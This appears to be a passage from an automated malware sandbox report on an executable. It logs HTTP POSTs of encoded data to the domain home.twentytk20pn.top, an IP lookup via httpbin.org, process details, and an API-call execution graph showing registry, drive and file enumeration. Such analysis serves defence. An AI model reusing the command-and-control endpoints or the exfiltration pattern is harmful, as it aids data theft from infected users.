                                                              Data Ascii: +R27fhTPn++ib\/wDp3\/Afmf6cU4fcj\/8Aan\/Hx\/n1pp+87874\/wB15n+cnk\/SgPa\/3vw\/4BBt8tt\/\/bKKP\/P+e\/pUXlpH+5dP\/wBXf+g\/wq1JJ99B8\/ceZL+44\/z3\/pUDbPM+dJX\/AHQ83\/6\/Jx\/Q1p7Pz\/D\/AIJ0DJPJ\/gTf5f8An29P5+lQybG3v9zzJTiTp+X+TmptqbU+WR3z1j\/zx\/8
                                                              Dec 20, 2024 16:41:23.352536917 CET9888OUTData Raw: 74 4c 51 55 39 63 71 79 49 6a 37 33 5c 2f 41 4e 62 35 6b 6b 76 2b 65 63 5a 71 49 74 7a 39 5c 2f 5a 43 5a 66 33 76 5c 2f 41 44 77 7a 6e 5c 2f 50 54 38 76 54 54 32 66 6e 2b 48 5c 2f 42 4f 67 5c 2f 64 32 69 73 54 78 4a 72 31 6e 34 59 30 50 55 74 66
                                                              Data Ascii: tLQU9cqyIj73\/ANb5kkv+ecZqItz9\/ZCZf3v\/ADwzn\/PT8vTT2fn+H\/BOg\/d2isTxJr1n4Y0PUtf1A4stLtzc3B3BcRh1T7xBA5cc4Ndt8U9I0b4V3HxEtJfiv8G\/iHe\/Br4t+HPgh8adJ+G+tfEl9Y+E\/wAQvF+neK9S8Lab4ptviX8JvhjZapp+uJ4G8V2lprvgXUvGOiRajo01le39q91pzXvxGf8AHHCfC2YZT
                                                              Dec 20, 2024 16:41:23.352700949 CET4944OUTData Raw: 59 56 4b 59 5c 2f 54 38 66 36 47 70 5c 2f 4b 66 30 5c 2f 51 5c 2f 34 55 7a 59 5c 2f 74 2b 58 5c 2f 41 4e 6c 51 61 55 2b 76 39 66 31 5c 2f 77 78 57 6f 71 56 2b 6e 34 5c 2f 30 4e 52 55 47 68 45 5c 2f 58 38 50 36 6d 6d 56 4a 4a 32 5c 2f 48 2b 6c 52
                                                              Data Ascii: YVKY\/T8f6Gp\/Kf0\/Q\/4UzY\/t+X\/ANlQaU+v9f1\/wxWoqV+n4\/0NRUGhE\/X8P6mmVJJ2\/H+lR0GntPL8f+ARydvx\/pUdWKg2P7fl\/wDZUHR7Ty\/H\/gEL9fw\/qahZd38vrVh+n4\/0NNw\/v+f\/ANetvf8A7v4mhT2+X+hz\/KlqWTon0P8AOoqo7vf\/ALv4kMvf\/d\/xpnDD2NTP0\/H+hqKgor+Xs989\
                                                              Dec 20, 2024 16:41:24.491043091 CET212INHTTP/1.0 503 Service Unavailable
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.549809147.45.113.159803668C:\Users\user\Desktop\f9bcOz8SxR.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 20, 2024 16:41:25.344901085 CET287OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                              Host: home.twentytk20pn.top
                                                              Accept: */*
                                                              Content-Type: application/json
                                                              Content-Length: 143
                                                              Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                              Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                              Dec 20, 2024 16:41:26.724858999 CET212INHTTP/1.0 503 Service Unavailable
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.54971434.226.108.1554433668C:\Users\user\Desktop\f9bcOz8SxR.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-20 15:40:47 UTC52OUTGET /ip HTTP/1.1
                                                              Host: httpbin.org
                                                              Accept: */*
                                                              2024-12-20 15:40:47 UTC224INHTTP/1.1 200 OK
                                                              Date: Fri, 20 Dec 2024 15:40:47 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 31
                                                              Connection: close
                                                              Server: gunicorn/19.9.0
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Credentials: true
                                                              2024-12-20 15:40:47 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                              Data Ascii: { "origin": "8.46.123.189"}


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:10:40:43
                                                              Start date:20/12/2024
                                                              Path:C:\Users\user\Desktop\f9bcOz8SxR.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\f9bcOz8SxR.exe"
                                                              Imagebase:0x880000
                                                              File size:4'436'480 bytes
                                                              MD5 hash:1D057672840921889505863B33E87671
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:3.5%
                                                                Dynamic/Decrypted Code Coverage:48.5%
                                                                Signature Coverage:9.3%
                                                                Total number of Nodes:557
                                                                Total number of Limit Nodes:58
                                                                execution_graph 88549 c0b160 Sleep 88068 8813c9 88071 881160 88068->88071 88070 8813a1 88071->88070 88072 c08a20 islower islower 88071->88072 88072->88071 88550 89d5e0 88551 89d652 WSAStartup 88550->88551 88552 89d5f0 88550->88552 88551->88552 88073 8bb3c0 88074 8bb3cb 88073->88074 88075 8bb3ee 88073->88075 88079 8876a0 88074->88079 88083 8b9290 88074->88083 88076 8bb3ea 88080 8876c0 88079->88080 88081 8876e6 send 88079->88081 88080->88081 88082 8876c9 88080->88082 88081->88082 88082->88076 88084 8876a0 send 88083->88084 88085 8b92e5 88084->88085 88086 8b9335 WSAIoctl 88085->88086 88089 8b9392 88085->88089 88087 8b9366 88086->88087 88086->88089 88088 8b9371 setsockopt 88087->88088 88087->88089 88088->88089 88089->88076 88090 8be400 88091 8be459 88090->88091 88093 8be412 88090->88093 88094 8b68b0 socket ioctlsocket connect getsockname closesocket 88093->88094 88094->88091 88095 8bb400 88096 8bb40b 88095->88096 88097 8bb425 88095->88097 88100 887770 88096->88100 88098 8bb421 88101 887790 88100->88101 88102 8877b6 recv 88100->88102 88101->88102 88103 887799 88101->88103 88102->88103 88103->88098 88104 700034e Process32FirstW 88105 7000371 88104->88105 88553 891139 88554 891148 88553->88554 88556 891527 88554->88556 88559 890f69 88554->88559 88561 88fec0 6 API calls 88554->88561 88556->88559 88562 8922d0 6 API calls 88556->88562 88558 890f00 88559->88558 88563 8bd4d0 socket ioctlsocket connect getsockname closesocket 88559->88563 88561->88556 88562->88559 88563->88558 88106 933c00 88107 933c0d 88106->88107 88108 933c23 88106->88108 88108->88107 88110 94b180 88108->88110 88111 94b19b 88110->88111 88117 94b2e3 88110->88117 88114 94b2a9 getsockname 88111->88114 88116 94b020 closesocket 88111->88116 88111->88117 88118 94af30 88111->88118 88122 94b060 88111->88122 88127 94b020 88114->88127 88116->88111 88117->88107 88119 94af63 socket 88118->88119 88120 94af4c 88118->88120 88119->88111 88120->88119 88121 94af52 88120->88121 88121->88111 88125 94b080 88122->88125 88123 94b0b0 connect 88124 94b0bf WSAGetLastError 88123->88124 88124->88125 88126 94b0ea 88124->88126 88125->88123 88125->88124 88125->88126 88126->88111 88128 94b052 88127->88128 88129 94b029 88127->88129 88128->88111 88130 94b04b closesocket 88129->88130 88131 94b03e 88129->88131 88130->88128 88131->88111 88564 934720 88568 934728 88564->88568 88565 934733 88567 934774 88568->88565 88575 93476c 88568->88575 88576 935540 socket ioctlsocket connect getsockname closesocket 88568->88576 88570 93482e 88570->88575 88577 939270 88570->88577 88572 934860 88582 934950 88572->88582 88574 934878 88575->88574 88588 9330a0 socket ioctlsocket connect getsockname closesocket 88575->88588 88576->88570 88589 93a440 88577->88589 88579 939297 88581 9392ab 88579->88581 88623 93bbe0 socket ioctlsocket connect getsockname closesocket 88579->88623 88581->88572 88583 934966 88582->88583 88585 9349c5 88583->88585 88587 9349b9 88583->88587 88624 93bbe0 socket ioctlsocket connect getsockname closesocket 88583->88624 88584 934aa0 gethostname 88584->88585 88584->88587 88585->88575 88587->88584 88587->88585 88588->88567 88590 93a46b 88589->88590 88592 93a48b GetAdaptersAddresses 88590->88592 88621 93a4db 88590->88621 88591 93aa03 RegOpenKeyExA 88593 93ab70 RegOpenKeyExA 88591->88593 88594 93aa27 RegQueryValueExA 88591->88594 88608 93a4a6 88592->88608 88592->88621 88597 93ac34 RegOpenKeyExA 88593->88597 88610 93ab90 88593->88610 88595 93aa71 88594->88595 88596 93aacc RegQueryValueExA 88594->88596 88595->88596 88605 93aa85 RegQueryValueExA 88595->88605 88598 93ab66 RegCloseKey 88596->88598 88599 93ab0e 88596->88599 88600 93acf8 RegOpenKeyExA 88597->88600 88620 93ac54 88597->88620 88598->88593 88599->88598 88609 93ab1e RegQueryValueExA 88599->88609 88602 93ad56 RegEnumKeyExA 88600->88602 88604 93ad14 88600->88604 88601 93a4f3 GetAdaptersAddresses 88616 93a505 88601->88616 88601->88621 88603 93ad9b 88602->88603 88602->88604 88606 93ae16 RegOpenKeyExA 88603->88606 88604->88579 88607 93aab3 88605->88607 88611 93ae34 RegQueryValueExA 88606->88611 88612 93addf RegEnumKeyExA 88606->88612 88607->88596 88608->88601 88608->88621 88615 93ab4c 88609->88615 88610->88597 88614 93af43 RegQueryValueExA 88611->88614 88622 93adaa 88611->88622 88612->88604 88612->88606 88613 93a527 GetAdaptersAddresses 88613->88621 88617 93b052 RegQueryValueExA 88614->88617 88614->88622 88615->88598 88616->88613 88616->88621 88618 93adc7 RegCloseKey 88617->88618 88617->88622 88618->88612 88619 93afa0 RegQueryValueExA 88619->88622 88620->88600 88621->88591 88621->88604 88622->88614 88622->88617 88622->88618 88622->88619 88623->88581 88624->88587 88132 94a080 88135 949740 88132->88135 88134 94a09b 88136 949780 88135->88136 88140 94975d 88135->88140 88137 949925 RegOpenKeyExA 88136->88137 88136->88140 88138 94995a RegQueryValueExA 88137->88138 88137->88140 88139 949986 RegCloseKey 88138->88139 88139->88140 88140->88134 88141 88255d 88193 c09f70 88141->88193 88143 88256c GetSystemInfo 88144 882589 88143->88144 88145 8825a0 GlobalMemoryStatusEx 88144->88145 88146 8825ec 88145->88146 88153 88261b 88146->88153 88195 6fb08cc 88146->88195 88204 6fb0906 88146->88204 88213 6fb0a8d 88146->88213 88221 6fb0a0d 88146->88221 88229 6fb0ac8 88146->88229 88237 6fb0bce 88146->88237 88245 6fb0b55 88146->88245 88253 6fb084a 88146->88253 88262 6fb0890 88146->88262 88271 6fb0a15 88146->88271 88279 6fb0b91 88146->88279 88287 6fb0b10 88146->88287 88295 6fb0853 88146->88295 88305 6fb0cd2 GetLogicalDrives 88146->88305 88307 6fb0a5d 88146->88307 88315 6fb0c13 88146->88315 88321 6fb0b65 88146->88321 88329 6fb0a9b 88146->88329 88337 6fb0be7 88146->88337 88345 6fb0ca5 88146->88345 88350 6fb0ae3 88146->88350 88358 6fb0c61 88146->88358 88364 6fb0a2c 88146->88364 88372 6fb0b2c 88146->88372 88380 6fb0bb4 88146->88380 88388 6fb0a6c 88146->88388 88396 6fb0b31 88146->88396 88404 6fb0cf0 88146->88404 88410 6fb0a7c 88146->88410 88418 6fb08f3 88146->88418 88427 6fb0c7e 88146->88427 88433 6fb0a3e 88146->88433 88441 6fb0c3a 88146->88441 88447 6fb08b9 88146->88447 88457 6fb0c05 88146->88457 88147 88263c GetDriveTypeA 88149 882655 GetDiskFreeSpaceExA 88147->88149 88147->88153 88148 882762 88150 8827d6 KiUserCallbackDispatcher 88148->88150 88149->88153 88151 8827f8 88150->88151 88152 882842 SHGetKnownFolderPath 88151->88152 88154 8828c3 88152->88154 88153->88147 88153->88148 88155 8828d9 FindFirstFileW 88154->88155 88156 882906 FindNextFileW 88155->88156 88157 882928 88155->88157 88156->88156 88156->88157 88194 c09f7d 88193->88194 88194->88143 88194->88194 88197 6fb08d7 88195->88197 88196 6fb0926 88197->88196 88198 6fb0c05 2 API calls 88197->88198 88199 6fb0bf6 88198->88199 88200 6fb0cd2 GetLogicalDrives 88199->88200 88201 6fb0cbe 88200->88201 88202 6fb0cf9 88201->88202 88203 6fb0cd3 GetLogicalDrives 88201->88203 88203->88202 88206 6fb0924 88204->88206 88205 6fb0926 88206->88205 88207 6fb0c05 2 API calls 88206->88207 88208 6fb0bf6 88207->88208 88209 6fb0cd2 GetLogicalDrives 88208->88209 88210 6fb0cbe 88209->88210 88211 6fb0cf9 88210->88211 88212 6fb0cd3 GetLogicalDrives 88210->88212 88212->88211 88214 6fb0aae 88213->88214 88215 6fb0c05 2 API calls 88214->88215 88216 6fb0bf6 88215->88216 88217 6fb0cd2 GetLogicalDrives 88216->88217 88218 6fb0cbe 88217->88218 88219 6fb0cf9 88218->88219 88220 6fb0cd3 GetLogicalDrives 88218->88220 88220->88219 88222 6fb0a19 88221->88222 88223 6fb0c05 2 API calls 88222->88223 88224 6fb0bf6 88223->88224 88225 6fb0cd2 GetLogicalDrives 88224->88225 88226 6fb0cbe 88225->88226 88227 6fb0cf9 88226->88227 88228 6fb0cd3 GetLogicalDrives 88226->88228 88228->88227 88230 6fb0ad9 88229->88230 88231 6fb0c05 2 API calls 88230->88231 88232 6fb0bf6 88231->88232 88233 6fb0cd2 GetLogicalDrives 88232->88233 88234 6fb0cbe 88233->88234 88235 6fb0cf9 88234->88235 88236 6fb0cd3 GetLogicalDrives 88234->88236 88236->88235 88238 6fb0be1 88237->88238 88239 6fb0c05 2 API calls 88238->88239 88240 6fb0bf6 88239->88240 88241 6fb0cd2 GetLogicalDrives 88240->88241 88242 6fb0cbe 88241->88242 88243 6fb0cf9 88242->88243 88244 6fb0cd3 GetLogicalDrives 88242->88244 88244->88243 88246 6fb0b59 88245->88246 88247 6fb0c05 2 API calls 88246->88247 88248 6fb0bf6 88247->88248 88249 6fb0cd2 GetLogicalDrives 88248->88249 88250 6fb0cbe 88249->88250 88251 6fb0cf9 88250->88251 88252 6fb0cd3 GetLogicalDrives 88250->88252 88252->88251 88255 6fb0861 88253->88255 88254 6fb0926 88255->88254 88256 6fb0c05 2 API calls 88255->88256 88257 6fb0bf6 88256->88257 88258 6fb0cd2 GetLogicalDrives 88257->88258 88259 6fb0cbe 88258->88259 88260 6fb0cf9 88259->88260 88261 6fb0cd3 GetLogicalDrives 88259->88261 88261->88260 88264 6fb0892 88262->88264 88263 6fb0926 88264->88263 88265 6fb0c05 2 API calls 88264->88265 88266 6fb0bf6 88265->88266 88267 6fb0cd2 GetLogicalDrives 88266->88267 88268 6fb0cbe 88267->88268 88269 6fb0cf9 88268->88269 88270 6fb0cd3 GetLogicalDrives 88268->88270 88270->88269 88272 6fb0a36 88271->88272 88273 6fb0c05 2 API calls 88272->88273 88274 6fb0bf6 88273->88274 88275 6fb0cd2 GetLogicalDrives 88274->88275 88276 6fb0cbe 88275->88276 88277 6fb0cf9 88276->88277 88278 6fb0cd3 GetLogicalDrives 88276->88278 88278->88277 88280 6fb0b98 88279->88280 88281 6fb0c05 2 API calls 88280->88281 88282 6fb0bf6 88281->88282 88283 6fb0cd2 GetLogicalDrives 88282->88283 88284 6fb0cbe 88283->88284 88285 6fb0cf9 88284->88285 88286 6fb0cd3 GetLogicalDrives 88284->88286 88286->88285 88288 6fb0b3c 88287->88288 88289 6fb0c05 2 API calls 88288->88289 88290 6fb0bf6 88289->88290 88291 6fb0cd2 GetLogicalDrives 88290->88291 88292 6fb0cbe 88291->88292 88293 6fb0cf9 88292->88293 88294 6fb0cd3 GetLogicalDrives 88292->88294 88294->88293 88296 6fb0824 88295->88296 88298 6fb0861 88295->88298 88297 6fb0926 88298->88297 88299 6fb0c05 2 API calls 88298->88299 88300 6fb0bf6 88299->88300 88301 6fb0cd2 GetLogicalDrives 88300->88301 88302 6fb0cbe 88301->88302 88303 6fb0cf9 88302->88303 88304 6fb0cd3 GetLogicalDrives 88302->88304 88304->88303 88306 6fb0cf9 88305->88306 88308 6fb0a76 88307->88308 88309 6fb0c05 2 API calls 88308->88309 88310 6fb0bf6 88309->88310 88311 6fb0cd2 GetLogicalDrives 88310->88311 88312 6fb0cbe 88311->88312 88313 6fb0cf9 88312->88313 88314 6fb0cd3 GetLogicalDrives 88312->88314 88314->88313 88316 6fb0c1d 88315->88316 88317 6fb0cd2 GetLogicalDrives 88316->88317 88318 6fb0cbe 88317->88318 88319 6fb0cf9 88318->88319 88320 6fb0cd3 GetLogicalDrives 88318->88320 88320->88319 88322 6fb0b85 88321->88322 88323 6fb0c05 2 API calls 88322->88323 88324 6fb0bf6 88323->88324 88325 6fb0cd2 GetLogicalDrives 88324->88325 88326 6fb0cbe 88325->88326 88327 6fb0cf9 88326->88327 88328 6fb0cd3 GetLogicalDrives 88326->88328 88328->88327 88330 6fb0a41 88329->88330 88331 6fb0c05 2 API calls 88330->88331 88332 6fb0bf6 88331->88332 88333 6fb0cd2 GetLogicalDrives 88332->88333 88334 6fb0cbe 88333->88334 88335 6fb0cf9 88334->88335 88336 6fb0cd3 GetLogicalDrives 88334->88336 88336->88335 88338 6fb0bad 88337->88338 88339 6fb0c05 2 API calls 88338->88339 88340 6fb0bf6 88339->88340 88341 6fb0cd2 GetLogicalDrives 88340->88341 88342 6fb0cbe 88341->88342 88343 6fb0cf9 88342->88343 88344 6fb0cd3 GetLogicalDrives 88342->88344 88344->88343 88346 6fb0cbe 88345->88346 88347 6fb0cd2 GetLogicalDrives 88345->88347 88348 6fb0cf9 88346->88348 88349 6fb0cd3 GetLogicalDrives 88346->88349 88347->88346 88349->88348 88351 6fb0af2 88350->88351 88352 6fb0c05 2 API calls 88351->88352 88353 6fb0bf6 88352->88353 88354 6fb0cd2 GetLogicalDrives 88353->88354 88355 6fb0cbe 88354->88355 88356 6fb0cf9 88355->88356 88357 6fb0cd3 GetLogicalDrives 88355->88357 88357->88356 88359 6fb0c86 88358->88359 88360 6fb0cd2 GetLogicalDrives 88359->88360 88361 6fb0cbe 88360->88361 88362 6fb0cf9 88361->88362 88363 6fb0cd3 GetLogicalDrives 88361->88363 88363->88362 88365 6fb0a33 88364->88365 88366 6fb0c05 2 API calls 88365->88366 88367 6fb0bf6 88366->88367 88368 6fb0cd2 GetLogicalDrives 88367->88368 88369 6fb0cbe 88368->88369 88370 6fb0cf9 88369->88370 88371 6fb0cd3 GetLogicalDrives 88369->88371 88371->88370 88373 6fb0b35 88372->88373 88374 6fb0c05 2 API calls 88373->88374 88375 6fb0bf6 88374->88375 88376 6fb0cd2 GetLogicalDrives 88375->88376 88377 6fb0cbe 88376->88377 88378 6fb0cf9 88377->88378 88379 6fb0cd3 GetLogicalDrives 88377->88379 88379->88378 88381 6fb0be1 88380->88381 88382 6fb0c05 2 API calls 88381->88382 88383 6fb0bf6 88382->88383 88384 6fb0cd2 GetLogicalDrives 88383->88384 88385 6fb0cbe 88384->88385 88386 6fb0cd3 GetLogicalDrives 88385->88386 88387 6fb0cf9 88385->88387 88386->88387 88389 6fb0a76 88388->88389 88390 6fb0c05 2 API calls 88389->88390 88391 6fb0bf6 88390->88391 88392 6fb0cd2 GetLogicalDrives 88391->88392 88393 6fb0cbe 88392->88393 88394 6fb0cf9 88393->88394 88395 6fb0cd3 GetLogicalDrives 88393->88395 88395->88394 88397 6fb0b3c 88396->88397 88398 6fb0c05 2 API calls 88397->88398 88399 6fb0bf6 88398->88399 88400 6fb0cd2 GetLogicalDrives 88399->88400 88401 6fb0cbe 88400->88401 88402 6fb0cf9 88401->88402 88403 6fb0cd3 GetLogicalDrives 88401->88403 88403->88402 88405 6fb0c8e 88404->88405 88407 6fb0cf5 88404->88407 88406 6fb0cd2 GetLogicalDrives 88405->88406 88408 6fb0cbe 88406->88408 88408->88407 88409 6fb0cd3 GetLogicalDrives 88408->88409 88409->88407 88411 6fb0a82 88410->88411 88412 6fb0c05 2 API calls 88411->88412 88413 6fb0bf6 88412->88413 88414 6fb0cd2 GetLogicalDrives 88413->88414 88415 6fb0cbe 88414->88415 88416 6fb0cd3 GetLogicalDrives 88415->88416 88417 6fb0cf9 88415->88417 88416->88417 88420 6fb0917 88418->88420 88419 6fb0926 88420->88419 88421 6fb0c05 2 API calls 88420->88421 88422 6fb0bf6 88421->88422 88423 6fb0cd2 GetLogicalDrives 88422->88423 88424 6fb0cbe 88423->88424 88425 6fb0cf9 88424->88425 88426 6fb0cd3 GetLogicalDrives 88424->88426 88426->88425 88428 6fb0c8e 88427->88428 88429 6fb0cd2 GetLogicalDrives 88428->88429 88430 6fb0cbe 88429->88430 88431 6fb0cf9 88430->88431 88432 6fb0cd3 GetLogicalDrives 88430->88432 88432->88431 88434 6fb0a41 88433->88434 88435 6fb0c05 2 API calls 88434->88435 88436 6fb0bf6 88435->88436 88437 6fb0cd2 GetLogicalDrives 88436->88437 88438 6fb0cbe 88437->88438 88439 6fb0cf9 88438->88439 88440 6fb0cd3 GetLogicalDrives 88438->88440 88440->88439 88442 6fb0c3c 88441->88442 88443 6fb0cd2 GetLogicalDrives 88442->88443 88444 6fb0cbe 88443->88444 88445 6fb0cf9 88444->88445 88446 6fb0cd3 GetLogicalDrives 88444->88446 88446->88445 88448 6fb092f 88447->88448 88450 6fb08bc 88447->88450 88449 6fb0926 88450->88449 88451 6fb0c05 2 API calls 88450->88451 88452 6fb0bf6 88451->88452 88453 6fb0cd2 GetLogicalDrives 88452->88453 88454 6fb0cbe 88453->88454 88455 6fb0cf9 88454->88455 88456 6fb0cd3 GetLogicalDrives 88454->88456 88456->88455 88458 6fb0c1d 88457->88458 88459 6fb0cd2 GetLogicalDrives 88458->88459 88460 6fb0cbe 88459->88460 88461 6fb0cf9 88460->88461 88462 6fb0cd3 GetLogicalDrives 88460->88462 88462->88461 88463 883d5e 88468 883d30 88463->88468 88464 883d90 88472 88fcb0 6 API calls 88464->88472 88467 883dc1 88468->88463 88468->88464 88469 890ab0 88468->88469 88473 8905b0 88469->88473 88471 890acd 88471->88468 88472->88467 88474 8905bd 88473->88474 88477 8907c7 88473->88477 88475 890707 WSAEventSelect 88474->88475 88476 8907ef 88474->88476 88474->88477 88479 8876a0 send 88474->88479 88475->88474 88475->88477 88476->88477 88482 890847 88476->88482 88483 896fa0 88476->88483 88477->88471 88479->88474 88480 8909e8 WSAEnumNetworkEvents 88481 8909d0 WSAEventSelect 88480->88481 88480->88482 88481->88480 88481->88482 88482->88477 88482->88480 88482->88481 88484 896fd4 88483->88484 88486 896feb 88483->88486 88485 897207 select 88484->88485 88484->88486 88485->88486 88486->88482 88625 8829ff FindFirstFileA 88626 882a31 88625->88626 88627 882a5c RegOpenKeyExA 88626->88627 88628 882a93 88627->88628 88629 882ade CharUpperA 88628->88629 88630 882b0a 88629->88630 88631 882bf9 QueryFullProcessImageNameA 88630->88631 88632 882c3b CloseHandle 88631->88632 88634 882c64 88632->88634 88633 882df1 CloseHandle 88635 882e23 88633->88635 88634->88633 88487 8b8b50 88488 8b8b6b 88487->88488 88506 8b8bb5 88487->88506 88489 8b8b8f 88488->88489 88490 8b8bf3 88488->88490 88488->88506 88526 896e40 select 88489->88526 88507 8ba550 88490->88507 88493 8b8bfc 88497 8b8c1f connect 88493->88497 88498 8b8c35 88493->88498 88504 8b8cb2 88493->88504 88493->88506 88494 8b8ba1 88495 8b8cd9 SleepEx getsockopt 88494->88495 88494->88504 88494->88506 88499 8b8d18 88495->88499 88496 8ba150 getsockname 88505 8b8dff 88496->88505 88497->88498 88522 8ba150 88498->88522 88500 8b8d43 88499->88500 88499->88504 88503 8ba150 getsockname 88500->88503 88503->88506 88504->88496 88504->88505 88504->88506 88505->88506 88527 8878b0 closesocket 88505->88527 88508 8ba575 88507->88508 88511 8ba597 88508->88511 88529 8875e0 88508->88529 88510 8878b0 closesocket 88513 8ba713 88510->88513 88512 8ba811 setsockopt 88511->88512 88518 8ba83b 88511->88518 88520 8ba69b 88511->88520 88512->88518 88513->88493 88515 8baf56 88516 8baf5d 88515->88516 88515->88520 88516->88513 88517 8ba150 getsockname 88516->88517 88517->88513 88518->88520 88521 8babe1 88518->88521 88535 8b6be0 8 API calls 88518->88535 88520->88510 88520->88513 88521->88520 88534 8e67e0 ioctlsocket 88521->88534 88523 8ba15f 88522->88523 88525 8ba1d0 88522->88525 88524 8ba181 getsockname 88523->88524 88523->88525 88524->88525 88525->88494 88526->88494 88528 8878c5 88527->88528 88528->88506 88530 8875ef 88529->88530 88531 887607 socket 88529->88531 88530->88531 88533 887643 88530->88533 88532 88762b 88531->88532 88532->88511 88533->88511 88534->88515 88535->88521 88636 8b95b0 88637 8b95c8 88636->88637 88639 8b95fd 88636->88639 88638 8ba150 getsockname 88637->88638 88637->88639 88638->88639 88640 8b6ab0 88641 8b6ad5 88640->88641 88642 8b6bb4 88641->88642 88644 896fa0 select 88641->88644 88643 935ed0 7 API calls 88642->88643 88646 8b6ba9 88643->88646 88645 8b6b54 88644->88645 88645->88642 88645->88646 88647 8b6b5d 88645->88647 88647->88646 88649 935ed0 88647->88649 88652 935a50 88649->88652 88651 935ee5 88651->88647 88653 935a58 88652->88653 88659 935ea0 88652->88659 88654 935b50 88653->88654 88664 935b88 88653->88664 88665 935a99 88653->88665 88657 935eb4 88654->88657 88658 935b7a 88654->88658 88654->88664 88655 935e96 88685 949480 socket ioctlsocket connect getsockname closesocket 88655->88685 88686 936f10 socket ioctlsocket connect getsockname closesocket 88657->88686 88675 9370a0 88658->88675 88659->88651 88662 935ec2 88662->88662 88668 935cae 88664->88668 88683 935ef0 socket ioctlsocket connect getsockname 88664->88683 88665->88664 88669 9370a0 6 API calls 88665->88669 88682 936f10 socket ioctlsocket connect getsockname closesocket 88665->88682 88668->88655 88671 94a920 88668->88671 88684 949320 socket ioctlsocket connect getsockname closesocket 88668->88684 88669->88665 88672 94a944 88671->88672 88673 94a94b 88672->88673 88674 94a977 send 88672->88674 88673->88668 88674->88668 88679 9370ae 88675->88679 88677 9371a7 88677->88664 88678 93717f 88678->88677 88692 949320 socket ioctlsocket connect getsockname closesocket 88678->88692 88679->88677 88679->88678 88687 94a8c0 88679->88687 88691 9371c0 socket ioctlsocket connect getsockname 88679->88691 88682->88665 88683->88664 88684->88668 88685->88659 88686->88662 88688 94a8e6 88687->88688 88689 94a903 recvfrom 88687->88689 88688->88689 88690 94a8ed 88688->88690 88689->88690 88690->88679 88691->88679 88692->88677 88693 cbd270 88695 cbd29a 88693->88695 88694 cbd2a6 88695->88694 88698 c112a0 88695->88698 88697 cbd2da 88699 c112ac 88698->88699 88702 c0e030 88699->88702 88701 c112da 88701->88697 88704 c0e07d 88702->88704 88703 c0e16e 88703->88701 88704->88703 88706 c0b180 islower islower 88704->88706 88706->88704 88536 8831d7 88537 8831f4 88536->88537 88538 883200 88537->88538 88539 8832dc CloseHandle 88537->88539 88539->88538 88540 882f17 88548 882f2c 88540->88548 88541 8831d3 88542 882fb3 RegOpenKeyExA 88542->88548 88543 88315c RegEnumKeyExA 88544 8831b2 RegCloseKey 88543->88544 88543->88548 88544->88548 88545 883046 RegOpenKeyExA 88546 883089 RegQueryValueExA 88545->88546 88545->88548 88547 88313b RegCloseKey 88546->88547 88546->88548 88547->88548 88548->88541 88548->88542 88548->88543 88548->88545 88548->88547

                                                                Executed Functions

                                                                Function 008BF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
